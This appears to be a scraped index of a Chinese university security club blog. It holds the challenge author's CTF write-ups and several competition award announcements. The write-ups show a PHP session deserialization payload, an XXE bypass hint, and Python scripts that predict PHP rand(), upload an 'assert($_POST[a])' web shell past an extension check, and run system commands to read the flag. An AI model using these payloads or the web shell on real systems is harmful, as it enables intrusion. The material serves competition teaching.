<?php\n    ini_set('session.serialize_handler', 'php_binary');\n    session_start();\n\n    if(isset($_POST['username']) && isset($_POST['password'])){\n        $username = $_POST['username'];\n        $password = $_POST['password'];\n        $_SESSION[\"username\"] = $username;\n        header(\"Location:./index.php\");\n    }\n    else if(isset($_SESSION[\"username\"])){\n        echo '<h1>hello '.$_SESSION[\"username\"].'</h1>';\n    }\n    else ...\n

flag.php

<?php\nsession_start();\nclass MOCTF{\n    public $flag;\n    public $name;\n    function __destruct(){\n        $this->flag = \"moctf{xxxxxxxxxxxxxxxx}\";\n        if($this->flag == $this->name){\n            echo \"Wow,this is flag:\".$this->flag;\n        }\n    }\n}\n

\u770b\u6e90\u7801\u5c31\u53ef\u4ee5\u77e5\u9053\u8fd9\u9053\u9898\u8003\u67e5\u7684\u662fsession\u53cd\u5e8f\u5217\u6f0f\u6d1e\u4e86 \u5728index.php\u4e2dphp\u7684\u5e8f\u5217\u5316handler\u662f\u2019php_binary\u2019\uff0c\u800cflag.php\u91cc\u6ca1\u6709\u8bbe\u7f6e\uff0c\u5c31\u662f\u9ed8\u8ba4\u7684\u2019php\u2019

ini_set('session.serialize_handler', 'php_binary');\n

\u53c2\u8003https://blog.spoock.com/2016/10/16/php-serialize-problem/ index.php\u4e2d\u7684$_session['username']\u53ef\u63a7\uff0c\u6211\u4eec\u5c31\u80fd\u6784\u9020payload\u5230session\uff0c \u7136\u540e\u8bbf\u95eeflag.php\u9875\u9762\u5c31\u80fd\u89e6\u53d1\u53cd\u5e8f\u5217\u5316\u6267\u884c__destruct\u4e86\uff0c \u8fd9\u91cc\u8fd8\u6709\u4e2a\u8003\u70b9\u662f$this->flag == $this->name\uff0c\u901a\u8fc7\u5f15\u7528\u7684\u65b9\u5f0f\u7ed5\u8fc7\u3002 \u6784\u9020payload

$a = new MOCTF();\n$a->name = &$a->flag;\necho '|'.serialize($a);\n
|O:5:\"MOCTF\":2:{s:4:\"flag\";N;s:4:\"name\";R:2;}\n

\u63d0\u4ea4\u5230index.php\u7684username\uff0c\u7136\u540e\u8bbf\u95eeflag.php\u5c31\u5f97\u5230flag\u4e86

","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#400","title":"\u5b57\u7b26\u4e32\u68c0\u67e5 400","text":"
\u6765\u68c0\u67e5\u4e00\u4e0b\u4f60\u7684\u5b57\u7b26\u4e32\u662f\u5426\u683c\u5f0f\u826f\u597d\u5427\uff01\nhttp://111.230.32.124:6002/\n

\u539f\u610f\u662fxxe\u6f0f\u6d1e\u8bfb\u53d6\u4efb\u610f\u6587\u4ef6 \u540e\u6765\u77e5\u9053\u5e08\u5085\u4eec\u5361\u4e86\u5f88\u4e45\u8c8c\u4f3c\u662f\u56e0\u4e3aclient-ip\u7684\u539f\u56e0\uff0c\u6211\u7684\u9505 \u9898\u76ee\u6253\u5f00\u662f\u4e2ajson\u5b57\u7b26\u4e32\u9a8c\u8bc1\u7684\u9875\u9762\uff0cPOST\u5305\u7684Content-Type\u5b57\u6bb5\u662fapplication/json\uff0c POST\u540e\u63a5\u53e3\u4f1a\u8fd4\u56dejson\u683c\u5f0f\u6b63\u786e\u6216\u9519\u8bef\u7684\u7ed3\u679c \u6539\u6210application/xml\uff0c\u63a5\u53e3\u63d0\u793a\u53ea\u5141\u8bb8\u672c\u673a\u8bbf\u95ee\uff0c\u4e8e\u662f\u6784\u9020

client-ip:localhost\n

\u7136\u540e\u5c31\u662fxxe\u76f2\u6253\u6f0f\u6d1e\u4e86\uff0c\u53c2\u8003https://security.tencent.com/index.php/blog/msg/69 \u8fd9\u91cc\u6211\u53ea\u9650\u5236\u4e86payload\u957f\u5ea6\u4e3a170\u4ee5\u5185\uff0c\u5176\u5b9e\u5b8c\u5168\u53ef\u4ee5\u66f4\u77ed\u7684\uff0c\u5e0c\u671b\u5927\u4f6c\u4eec\u53ef\u4ee5\u6d4b\u8bd5\u6d4b\u8bd5 \u6700\u540eflag\u5728/etc/passwd

","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#400_1","title":"\u7b80\u5355\u5ba1\u8ba1 400","text":"
\u4ee3\u7801\u90fd\u7ed9\u4f60\u4e86\uff0c\u8fd8\u8bf4\u4e0d\u4f1a\u505a\uff1f\nhttp://120.78.57.208:6005/\n

index.php

<?php\nerror_reporting(0);\ninclude('config.php');\nheader(\"Content-type:text/html;charset=utf-8\");\nfunction get_rand_code($l = 6) {\n    $result = '';\n    while($l--) {\n        $result .= chr(rand(ord('a'), ord('z')));\n    }\n    return $result;\n}\n\nfunction test_rand_code() {\n    $ip=$_SERVER['REMOTE_ADDR'];\n    $code=get_rand_code();\n    $socket = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);\n    @socket_connect($socket, $ip, 8888);\n    @socket_write($socket, $code.PHP_EOL);\n    @socket_close($socket);\n    die('test ok!');\n}\n\nfunction upload($filename, $content,$savepath) {\n    $AllowedExt = array('bmp','gif','jpeg','jpg','png');\n    if(!is_array($filename)) {\n        $filename = explode('.', $filename);\n    }\n    if(!in_array(strtolower($filename[count($filename)-1]),$AllowedExt)){\n        die('error ext!');\n    }\n    $code=get_rand_code();\n    $finalname=$filename[0].'moctf'.$code.\".\".end($filename);\n    file_put_contents(\"$savepath\".$finalname, $content);\n    usleep(3000000);\n    unlink(\"$savepath\".$finalname);\n    die('upload over!');\n}\n\n$savepath=\"uploads/\".sha1($_SERVER['REMOTE_ADDR']).\"/\";\nif(!is_dir($savepath)){\n    $oldmask = umask(0);\n    mkdir($savepath, 0777);\n    umask($oldmask);\n}\nif(isset($_GET['action']))\n{\n    $act=$_GET['action'];\n    if($act==='upload')\n    {\n        $filename=$_POST['filename'];\n        if(!is_array($filename)) {\n            $filename = explode('.', $filename);\n        }\n        $content=$_POST['content'];\n        waf($content);\n        upload($filename,$content,$savepath);\n    }\n    else if($act==='test')\n    {\n        test_rand_code();\n    }\n}\nelse {\n    highlight_file('index.php');\n}\n?>\n

\u89e3\u91ca\u4e00\u4e0b\u9898\u76ee\u7684\u610f\u601d \u6839\u636eaction\u6267\u884c\u5bf9\u5e94\u64cd\u4f5c\uff0caction=test\u4f1a\u8c03\u7528test_rand_code\u51fd\u6570\u53d1\u9001tcp\u5305\u5230\u8bbf\u5ba2\u7684ip action=upload\u65f6\u4f1a\u5199\u5165\u4e00\u4e2a\u6587\u4ef6\uff0c\u6587\u4ef6\u5185\u5bb9\u6709waf\u62e6\u622a\uff0c\u6587\u4ef6\u540d\u6709\u767d\u540d\u5355\u9650\u5236\u540e\u7f00\uff0c \u7136\u540e\u62fc\u63a5\u6587\u4ef6\u540d\u52a0\u5165rand\u7684\u5b57\u7b26\u4e32\uff0c\u5199\u5165\u6587\u4ef6\uff0c\u6587\u4ef6\u5199\u5165\u540e\u8fc73\u79d2unlink\u5220\u9664 \u6709\u95ee\u9898\u7684\u70b9\u6709\u8fd9\u51e0\u4e2a 1.filename\u68c0\u67e5\u662f\u7528$filename[count($filename)-1]\u53d6\u7684\u540e\u7f00\uff0c\u662f\u6309\u7167\u4e0b\u6807\u53d6\u7684\uff0c\u800c\u5199\u5165\u6587\u4ef6\u65f6\u7528\u7684\u662fend($filename)\uff0c\u662f\u53d6\u6700\u540e\u4e00\u4e2a\u5143\u7d20\uff0c\u53ea\u8981post\u65f6\u63d0\u4ea4filename[1]=jpg&filename[0]=php\u5c31\u80fd\u7ed5\u8fc7\u4e86 2.$content\u7684waf\u7ed5\u8fc7\uff0c \u7ed5\u8fc7\u5373\u53ef 3.\u4f7f\u7528rand()\u751f\u6210\u968f\u673a\u6570\uff0c\u53ef\u4ee5\u88ab\u9884\u6d4b\uff0c\u53c2\u8003https://www.sjoerdlangkemper.nl/2016/02/11/cracking-php-rand/

\u9884\u671f\u89e3\u6cd5\u662f 1.username\u6570\u7ec4bypass\u540e\u7f00\u68c0\u67e5\uff0c\u7ed5\u8fc7content\u7684waf 2.rand\u968f\u673a\u6570\u9884\u6d4b+\u7206\u7834\u6587\u4ef6\u540d \u5728unlink\u4e4b\u524d\u8bbf\u95eeshell \u7ed3\u679c\u5927\u4f6c\u4eec\u76f4\u63a5\u975e\u9884\u671f\u89e3bypass\u4e86unlink\u6253\u6270\u4e86 \u975e\u9884\u671f\u89e3\u53c2\u8003\u4e00\u53f6\u98d8\u96f6\u5e08\u5085\u7684WriteUp \u9884\u671f\u89e3\u5982\u4e0b \u5199\u4e24\u4e2a\u811a\u672c\uff0c listen.py

#\u76d1\u542c8888\u7aef\u53e3\uff0c\u63a5\u53d76\u4e2a`get_rand_code`\u7684\u7ed3\u679c\uff0c\u7136\u540e\u9884\u6d4b\u63a5\u4e0b\u6765\u4e00\u6b21`get_rand_code`\u7684\u7ed3\u679c\uff0c\u8fd9\u91cc\u53ef\u80fd\u4e0d\u4f1a\u5f88\u51c6\u786e\uff0c\n#\u6240\u4ee5\u9700\u8981\u5c0f\u5e45\u5ea6\u7206\u7834\uff0c\u590d\u6742\u5ea6\u5927\u6982\u4e3a3^6\uff0c\u53cd\u6b63\u5c31\u8dd1\u7740\u5457\n\n#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n#by xishir\nimport requests as req\nimport re\nfrom socket import *  \nfrom time import ctime  \nimport random\nimport itertools as its\nimport hashlib\n\nr=req.session()\nurl=\"http://120.78.57.208:6005/\"\n\n\ndef get_rand_list():\n    HOST = ''  \n    PORT = 8888\n    BUFSIZ = 128  \n    ADDR = (HOST, PORT)  \n    tcpSerSock = socket(AF_INET, SOCK_STREAM)\n    tcpSerSock.bind(ADDR)\n    tcpSerSock.listen(5)\n    rand_num=0\n    l=[]\n    while True:\n        tcpCliSock, addr = tcpSerSock.accept()  \n        while True:  \n            data = tcpCliSock.recv(BUFSIZ)  \n            if not data:  \n                break  \n            data=data[0:6]\n        print data,l\n            for i in data:\n                l.append(ord(i)+1-ord('a'))\n        rand_num+=1\n        if rand_num==6:\n            break\n    tcpCliSock.close()  \n    tcpSerSock.close()\n    return l\n\ndef get_salt(l):\n    salt=\"\"\n    for i in range(6):\n        j=len(l)\n        r=(l[j-3]+l[j-31])-1\n        if r>26:\n            r-=26\n        #print l[j-3],chr(l[j-3]+ord('a')-1),l[j-31],chr(l[j-31]+ord('a')-1),r,chr(r+ord('a')-1)\n        l.append(r)\n        salt+=chr(r+ord('a')-1)\n        #print salt\n    return salt\n\ndef get_flag(salt):\n    s=hashlib.sha1('119.23.73.3').hexdigest()\n    url1=url+'/uploads/'+s+'/'+'moctf'+salt+'.php'\n    data={\"a\":\"system('cat ../../flag.php');echo '666666';\"}\n    r2=r.post(url1,data=data)\n    print salt\n    if '404' not in r2.text:\n        print r2.text\n\nget_flag('aaaaaa')\nl=get_rand_list()\nsalt=get_salt(l)\ns=0\nfor i in range(100000):\n    s=s+1\nprint s\nwords = \"10\"\no=its.product(words,repeat=6)\nfor i in o:\n    s=\"\".join(i)\n    salt2=\"\"\n    for j in range(6):\n        salt2+=chr(ord(salt[j])-int(s[j]))\n    get_flag(salt2)\nwords = \"10\"\no=its.product(words,repeat=6)\nfor i in o:\n    s=\"\".join(i)\n    salt2=\"\"\n    for j in range(6):\n        salt2+=chr(ord(salt[j])+int(s[j]))\n    get_flag(salt2)\n

put.py

#\u901a\u8fc7`?action=test`\u8c03\u7528`test_rand_code`\u51fd\u6570\u53d1\u90016\u6b21`get_rand_code`\u7ed3\u679c\uff0c\u4e00\u517136\u4e2a\u5b57\u7b26\uff0c\n#\u7136\u540e\u63d0\u4ea4\u4e00\u4e2a\u6784\u9020\u597d\u7684`?action=test`\uff0c\u4e0a\u4f20shell\u5230\u670d\u52a1\u5668\uff0c\u5728\u88ab\u5220\u9664\u4e4b\u524d\u5c31\u4f1a\u88ablisten\u7206\u7834\u5f97\u5230\uff0c\u6ca1\u7206\u7834\u5230\u5c31\u591a\u7206\u7834\u51e0\u6b21\n\n#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n#by xishir\nimport requests as req\nimport re\n\nr=req.session()\nurl=\"http://120.78.57.208:6005/?action=\"\n\n\ndef get_test():\n    url2=url+\"test\"\n    r1=r.get(url2)\n    print url2\n    print r1.text\ndef upload():\n    data={\"filename[4]\":\"jpg\",\n          \"filename[2]\":\"jpg\",\n          \"filename[1]\":\"php\",\n          \"content\":\"<script language='php'>assert($_POST[a]);</script>\",\n          \"a\":\"system('cat ../../flag.php');\"\n          }\n    url1=url+\"upload\"\n    r2=r.post(url1,data=data)\n    print r2.text\n\nfor i in range(6):\n    get_test()\nupload()\n

\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b

","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#_2","title":"\u611f\u60f3","text":"

\u8bb2\u4e00\u4e0b\u8fd9\u6b21\u6bd4\u8d5b\u6211\u4e3b\u8981\u5e72\u4e86\u90a3\u4e9b\u4e8b\u5427

  1. \u51fa\u9898\uff0c\u5982\u4e0a\u6240\u8ff0
  2. \u5e73\u53f0\u642d\u5efa\uff0c\u7528\u7684\u662fctfd\uff0cdocker\u7684\u65b9\u5f0f\u642d\u5efa\u7684\uff0c\u7701\u4e86\u5f88\u591a\u4e8b
  3. \u9898\u76ee\u90e8\u7f72\uff0c\u9664\u4e86ping\u90a3\u9898\uff0c\u5176\u4ed6\u7684web\u90fd\u662f\u6211\u90e8\u7f72\u7684\uff0c\u5c24\u5176\u662fcms\u90a3\u9898\uff0c\u53cd\u590d\u90e8\u7f72\u7684\u6709\u70b9\u5410\uff0c\u4e2d\u95f4\u6709\u4e2a\u96c6\u5927\u5b66\u5f1f\u6765\u5e2e\u5fd9\uff0c\u540e\u9762\u6bd4\u8d5b\u7684\u65f6\u5019\u8fd8\u662f\u51fa\u4e86\u95ee\u9898
  4. \u53d1\u5e03\u9898\u76ee\uff0cemmmmmmmmmm\uff0c\u7528ctfd\u7684\u65f6\u5019\u51fa\u73b0\u4e86\u5f88\u795e\u5947\u7684\u60c5\u51b5\uff0c\u5728\u7f16\u8f91config\u7684\u65f6\u5019\u4f7f\u7528\u8c37\u6b4c\u7684\u81ea\u52a8\u7ffb\u8bd1\uff0c\u4fdd\u5b58\u4e4b\u540ectfd\u7684web\u670d\u52a1\u5c31\u6302\u6389\u5566\uff01\u662f\u4e2a\u5de8\u5751\uff0c\u73b0\u5728\u8fd8\u4e0d\u77e5\u9053\u548b\u56de\u4e8b
  5. \u6bd4\u8d5b\u65f6\u5019\u7684\u653e\u9898\uff0c\u653ehint\uff0c\u8fd0\u7ef4\uff0c\u6c34\u7fa4\uff0c\u54c8\u54c8\u54c8\u54c8\u548c\u5927\u4f6c\u4eec\u73a9\u800d\u8fd8\u662f\u5f88\u5f00\u5fc3\u7684 \u653e\u4e00\u4e9b\u540e\u53f0\u6570\u636e

\u539f\u6765\u53ea\u662f\u60f3\u7ed9\u6211\u4eec\u5b66\u6821\u548c\u96c6\u5927\u7684\u5b66\u5f1f\u4eec\u4f53\u9a8c\u6bd4\u8d5b\u7684\uff0c\u4e0d\u8fc7\u5bf9\u5916\u5f00\u653e\u4e5f\u5438\u5f15\u4e86\u8bb8\u591a\u5e08\u5085\u4eec\u6765\u505a\u9898\uff0c\u867d\u7136\u8fd0\u7ef4\u5f97\u5f88\u7d2f\uff0c\u4f46\u4e5f\u5b66\u5230\u4e86\u5f88\u591a\u4e1c\u897f\uff08\u4e3b\u8981\u662f\u975e\u9884\u671f\u548c\u90e8\u7f72\u5404\u79cd\u5947\u8469\u73af\u5883\uff09 \u6253\u4e00\u6ce2\u5e7f\u544a\uff0chttp://www.moctf.com/ MOCTF\u5e73\u53f0\u662fCodeMonster\u548cMokirin\u8fd9\u4e24\u652fCTF\u6218\u961f\u6240\u642d\u5efa\u7684\u4e00\u4e2aCTF\u5728\u7ebf\u7b54\u9898\u7cfb\u7edf\u3002\u9898\u76ee\u5f62\u5f0f\u4e0e\u5404\u5927CTF\u6bd4\u8d5b\u76f8\u540c\u3002\u76ee\u7684\u662f\u4e3a\u4e24\u4e2a\u5b66\u6821\u4e2d\u70ed\u7231\u4fe1\u606f\u5b89\u5168\u7684\u540c\u5b66\u4eec\u63d0\u4f9b\u4e00\u4e2a\u5237\u9898\u7684\u5e73\u53f0\uff0c\u80fd\u591f\u4e00\u8d77\u5b66\u4e60\u3001\u8fdb\u6b65\u3002

\u6700\u540e\u795d\u5927\u5bb6\u65b0\u5e74\u5feb\u4e50\uff01

","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/ab21d401-10e1-4021-9936-e7154fd9ed71/","title":"\u4e3e\u529e\u7b2c\u4e8c\u5c4a\u53a6\u95e8\u7406\u5de5\u201c\u56fd\u79d1-i\u6625\u79cb\u676f\u201d\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b","text":"

\u4e3a\u5e2e\u52a9\u5b66\u751f\u66f4\u597d\u5730\u611f\u77e5\u3001\u4e86\u89e3\u8eab\u8fb9\u7684\u7f51\u7edc\u5b89\u5168\u98ce\u9669\uff0c\u589e\u5f3a\u7f51\u7edc\u5b89\u5168\u610f\u8bc6\uff0c\u666e\u53ca\u7f51\u7edc\u5b89\u5168\u77e5\u8bc6\uff0c\u63d0\u9ad8\u7f51\u7edc\u5b89\u5168\u9632\u62a4\u6280\u80fd\uff0c\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u8ba1\u7b97\u673a\u4e0e\u4fe1\u606f\u5de5\u7a0b\u5b66\u9662\u7279\u6b64\u4e3e\u529e\u201c\u56fd\u79d1-i\u6625\u79cb\u676f\u201d\u7b2c\u4e8c\u5c4a\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b\uff0c\u4ee5\u6b64\u6380\u8d77\u5b66\u751f\u201c\u5171\u5efa\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u3001\u5171\u4eab\u7f51\u7edc\u6587\u660e\u5b66\u6821\u201d\u7684\u70ed\u6f6e\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/b6adcea6-60ce-4f44-9389-2a06d34125d8/","title":"\u201c\u767e\u8d8a\u676f\u201d\u7b2c\u56db\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e00\u7b49\u5956","text":"

\u4e3a\u8d2f\u5f7b\u843d\u5b9e\u4e2d\u592e\u7f51\u4fe1\u529e\u7b49\u516d\u90e8\u95e8\u300a\u5173\u4e8e\u52a0\u5f3a\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u5efa\u8bbe\u548c\u4eba\u624d\u57f9\u517b\u7684\u610f\u89c1\u300b\uff08\u4e2d\u7f51\u529e\u53d1\u6587\u30142016\u30154\u53f7\uff09\u7cbe\u795e\uff0c\u52a0\u5feb\u9ad8\u6821\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u4e13\u4e1a\u5efa\u8bbe\uff0c\u521b\u65b0\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u673a\u5236\uff0c\u7701\u6559\u80b2\u5385\u3001\u7701\u7f51\u5b89\u529e\u51b3\u5b9a\u8054\u5408\u4e3e\u529e\u7b2c\u4e09\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d\u3002

\u672c\u534f\u4f1a\u6d3e\u51fa\u7684CodeMonster\u6218\u961f\u5168\u7701\u7b2c\u4e8c\u593a\u5f97\u4e8c\u7b49\u5956\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/bb168e48-791c-4a1d-83c4-335b9db12499/","title":"2018 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u798f\u5efa\u8d5b\u533a \u4e00\u7b49\u5956\uff08\u7b2c2\u540d\uff09","text":"

2018\u5e745\u670811\u65e5\uff0c\u7531\u6559\u80b2\u90e8\u5b66\u6821\u89c4\u5212\u5efa\u8bbe\u53d1\u5c55\u4e2d\u5fc3\u3001\u4e2d\u56fd\u4fe1\u606f\u5b89\u5168\u6d4b\u8bc4\u4e2d\u5fc3\u4e3b\u529e\uff0c\u6559\u80b2\u90e8\u9ad8\u7b49\u5b66\u6821\u4fe1\u606f\u5b89\u5168\u4e13\u4e1a\u6559\u5b66\u6307\u5bfc\u59d4\u5458\u4f1a\u534f\u529e\uff0c\u4e2d\u56fd\u4fe1\u606f\u4ea7\u4e1a\u5546\u4f1a\u4fe1\u606f\u5b89\u5168\u4ea7\u4e1a\u5206\u4f1a\u3001\u5317\u4eac\u897f\u666e\u9633\u5149\u6559\u80b2\u79d1\u6280\u80a1\u4efd\u6709\u9650\u516c\u53f8\u3001\u798f\u5dde\u5927\u5b66\u627f\u529e\u76842017-2018\u5168\u56fd\u9ad8\u6821\u201c\u897f\u666e\u676f\u201d\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u7b2c\u4e03\u5206\u533a\u8d5b\u5728\u798f\u5dde\u5927\u5b66\u62c9\u5f00\u5e37\u5e55\uff0c\u6709\u6765\u81ea\u798f\u5efa\u5171\u8ba121\u6240\u9ad8\u6821\u8fd1100\u540d\u5b66\u751f\u540c\u573a\u7ade\u6280\u3002\u7ecf\u8fc7\u4e00\u5929\u7684\u7cbe\u5f69\u89d2\u9010\uff0c\u798f\u5efa\u519c\u6797\u5927\u5b66\u529b\u514b\u7fa4\u96c4\uff0c\u593a\u5f97\u7b2c\u4e03\u8d5b\u533a\u51a0\u519b\uff0c\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u3001\u95fd\u5357\u5e08\u8303\u5927\u5b66\u5206\u522b\u83b7\u5f97\u4e9a\u519b\u548c\u5b63\u519b\u3002

"},{"location":"posts/dfd03705-8ad1-420f-8534-0fd4086165e7/","title":"2017 XNUCA\u7b2c\u4e00\u671fWeb\u4e13\u9898 \u7b2c9\u540d","text":"

\u201c\u5168\u56fd\u9ad8\u6821\u7f51\u5b89\u8054\u8d5b(National University Cybersecurity Association\uff0c\u7b80\u79f0X-NUCA)\u201d\u662f\u9762\u5411\u5168\u56fd\u9ad8\u6821\u5b66\u751f\u7684\u7f51\u7edc\u5b89\u5168\u6280\u80fd\u7ade\u8d5b\uff0c\u9996\u5c4a\u6bd4\u8d5b\u5df2\u4e8e2016\u5e747\u670831\u65e5\u4e3e\u529e\uff0c\u5927\u8d5b\u79c9\u627f\u201c\u5bd3\u5b66\u4e8e\u8d5b\uff0c\u4ee5\u8d5b\u4fc3\u5b66\u201d\u7684\u7406\u5ff5\uff0c\u63a8\u51fa\u201c\u7ade\u8d5b+\u201d\u6a21\u5f0f\uff0c\u5c06\u8d5b\u524d\u6307\u5bfc\u3001\u8d5b\u4e2d\u953b\u70bc\u548c\u8d5b\u540e\u4ea4\u6d41\u4e09\u8005\u6709\u673a\u7ed3\u5408\uff0c\u65e8\u5728\u66f4\u597d\u5730\u4fc3\u8fdb\u56fd\u5bb6\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u7684\u57f9\u517b\u548c\u9009\u62d4\u3002 X-NUCA\u8054\u8d5b\u9762\u5411\u5168\u56fd\u5728\u6821\u5b66\u751f\uff0c\u5305\u62ec\u4e13\u79d1\u751f\u3001\u672c\u79d1\u751f\u3001\u7855\u58eb\u751f\u548c\u535a\u58eb\u751f\uff0c\u9700\u7531\u6307\u5bfc\u8001\u5e08\u5e26\u961f\u53c2\u8d5b\u30022017\u8d5b\u5b63\u5206\u4e3a\u4e13\u9898\u8d5b\u548c\u603b\u51b3\u8d5b\u4e24\u4e2a\u9636\u6bb5\uff0c\u9996\u6b21\u4e13\u9898\u8d5b2017\u5e748\u670826\u65e5\u4e3e\u529e\u3002\u4e13\u9898\u8d5b\u5305\u542b3\u671f\u7ebf\u4e0a\u8d5b\uff0c\u5206\u522b\u57288\u670826\u65e5\u300110\u67088\u65e5\u300111\u670825\u65e5\u4e3e\u529e\uff0c12\u6708\u4e3e\u529e\u603b\u51b3\u8d5b\u5e76\u9881\u5956\u3002 X-NUCA\u8054\u8d5b\u63a8\u51fa\u7684\u201c\u7ade\u8d5b+\u201d\u6a21\u5f0f\u901a\u8fc7\u5f15\u5165\u8d5b\u524d\u6307\u5bfc\u548c\u8d5b\u540e\u4ea4\u6d41\u73af\u8282\uff0c\u4f7f\u53c2\u8d5b\u9009\u624b\u4e0d\u4ec5\u53ef\u4ee5\u6bd4\u8d5b\uff0c\u8fd8\u53ef\u4ee5\u6709\u9488\u5bf9\u6027\u7684\u5b66\u4e60\u3002\u5728\u201c\u7ade\u8d5b+\u201d\u6a21\u5f0f\u4e2d\uff0c\u6bd4\u8d5b\u961f\u4f0d\u5e38\u89c4\u5316\u3001\u6bd4\u8d5b\u6d3b\u52a8\u5e38\u89c4\u5316\uff0c\u7c7b\u4f3c\u4e8e\u201cNBA\u201d\u6a21\u5f0f\u3002\u5728\u8fd9\u79cd\u6a21\u5f0f\u4e0b\uff0c\u53c2\u8d5b\u961f\u4f0d\u8363\u8a89\u611f\u66f4\u5f3a\uff0c\u4eba\u624d\u7684\u5f52\u5c5e\u611f\u66f4\u5f3a\uff0c\u66f4\u5bb9\u6613\u548c\u9ad8\u6821\u6b63\u89c4\u7684\u4eba\u624d\u57f9\u517b\u4f53\u7cfb\u76f8\u7ed3\u5408\u3002X-NUCA\u8054\u8d5b\u529b\u56fe\u5c06\u7ade\u8d5b\u5e73\u53f0\u3001\u5b66\u4e60\u5e73\u53f0\u3001\u4ea4\u6d41\u5e73\u53f0\u548c\u53c2\u8d5b\u56e2\u961f\u56db\u8005\u7d27\u5bc6\u8fde\u63a5\uff0c\u52aa\u529b\u843d\u5b9e\u201c\u5bd3\u5b66\u4e8e\u8d5b\uff0c\u4ee5\u8d5b\u4fc3\u5b66\u201d\u7684\u7406\u5ff5\uff0c\u65e8\u5728\u4fc3\u8fdb\u4e2d\u56fd\u9ad8\u6821\u7f51\u5b89\u6559\u5b66\u6c34\u5e73\u7684\u63d0\u9ad8\u548c\u7f51\u5b89\u4eba\u624d\u7684\u53d1\u73b0\u3002

\u6211\u4eec\u534f\u4f1a\u7684CodeMonster\u6218\u961f\u9996\u6b21\u53c2\u52a0\u672c\u6b21\u6bd4\u8d5b\uff0c\u53d6\u5f97\u4e86\u7ebf\u4e0a\u8d5b\u5168\u56fd\u7b2c9\u540d\u7684\u6210\u7ee9\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/dfd03705-8ad1-420f-8534-0fd4086165e7/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"

\u6bd4\u8d5b\u671f\u95f4\u622a\u56fe,\u4e00\u5ea6\u5360\u9886\u699c\u4e00\uff1a

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/f72cbee7-1294-46b9-92e3-49a3140255b2/","title":"2017 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u4f01\u4e1a\u8d5b\u534e\u5357\u8d5b\u533a \u4e09\u7b49\u5956\uff08\u7b2c3\u540d\uff09","text":"

\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u662f\u4e00\u9879\u9762\u5411\u5927\u5b66\u751f\u7684\u516c\u76ca\u6027\u79d1\u6280\u7c7b\u7ade\u8d5b\uff0c\u7531\u4e2d\u56fd\u4fe1\u606f\u4ea7\u4e1a\u5546\u4f1a\u4fe1\u606f\u5b89\u5168\u4ea7\u4e1a\u5206\u4f1a\u53d1\u8d77\u4e3b\u529e\uff0c\u901a\u8fc7\u6574\u5408\u4fe1\u606f\u5b89\u5168\u4ea7\u4e1a\u8d44\u6e90\u5bf9\u63a5\u9ad8\u6821\uff0c\u4e3a\u5927\u5b66\u751f\u63d0\u4f9b\u4e00\u4e2a\u8fdb\u884c\u4fe1\u606f\u5b89\u5168\u6280\u672f\u521b\u65b0\u3001\u6df1\u5165\u4ea7\u4e1a\u884c\u4e1a\u5e94\u7528\u4ee5\u53ca\u6269\u5c55\u5b89\u5168\u89c6\u91ce\u7684\u5e73\u53f0\uff0c\u63a8\u52a8\u6821\u4f01\u5408\u4f5c\u6a21\u5f0f\u7684\u4fe1\u606f\u5b89\u5168\u4eba\u624d\u57f9\u517b\uff0c\u4ece\u800c\u5b9e\u73b0\u4fe1\u606f\u5b89\u5168\u4f18\u79c0\u4eba\u624d\u7684\u57f9\u517b\u548c\u9009\u62e8\u6e20\u9053\u3002

\u5927\u8d5b\u5f3a\u8c03\u8d34\u8fd1\u5b9e\u6218\uff0c\u4ee5\u4fe1\u606f\u5b89\u5168\u5178\u578b\u884c\u4e1a\u5e94\u7528\u573a\u666f\u4e3a\u5927\u8d5b\u73af\u5883\uff0c\u91cd\u70b9\u68c0\u9a8c\u53c2\u8d5b\u5b66\u751f\u9762\u5bf9\u771f\u5b9e\u73af\u5883\u4e0b\u7684\u4fe1\u606f\u5b89\u5168\u5de5\u7a0b\u80fd\u529b\u548c\u653b\u9632\u6280\u672f\u80fd\u529b\u3002

